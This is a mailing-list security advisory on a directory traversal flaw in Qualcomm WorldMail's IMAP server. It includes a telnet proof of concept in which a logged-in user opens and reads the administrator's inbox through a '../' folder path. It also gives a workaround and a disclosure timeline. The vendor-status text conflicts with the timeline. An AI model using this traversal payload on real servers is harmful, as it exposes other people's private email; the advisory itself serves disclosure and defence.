The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Qualcomm WorldMail IMAP Server Directory Traversal
------------------------------------------------------------------------
SUMMARY
" <http://www.eudora.com/worldmail/> Qualcomm WorldMail is an email and
messaging server designed for use in small to large enterprises that
supports IMAP, POP3, SMTP, and web mail features."
Exploitation of a directory transversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.
DETAILS
Vulnerable Systems:
* Qualcomm Worldmail server version 3.0
The IMAP protocol support the use of multiple folders and contain commands
for authenticated users that can specify specific paths. Qualcomm
WorldMail server allow multiple commands to specify folders outside of the
current user's mailbox.
Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers can also have the
ability to move any arbitrary folder on the system.
Exploitation is trivial and can be done with a simple telnet client.
Proof of Concept:
c:\> telnet 192.168.0.109 143
* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed
2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox
2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox
2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}
this message was sent to administrator
Successful exploitation of this vulnerability allow attackers to view and
delete mail from any user on the system. Attackers may also be able to
affect system stability with the ability to move arbitrary folders on the
affected system.
In order to exploit this vulnerability an attacker would need a valid
login to the email server and the IMAP module would have to be enabled
(default).
Workaround:
Disable the IMAP protocol and use the POP protocol instead.
Vendor Status:
Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3189>
CAN-2005-3189
Disclosure Timeline:
10/12/2005 - Initial vendor notification
10/27/2005 - Initial vendor response
11/17/2005 - Public disclosure
ADDITIONAL INFORMATION
The information has been provided by
<mailto:idlabs-advisories@lists.idefense.com> iDEFENSE .
The original article can be found at:
<http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities>
http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
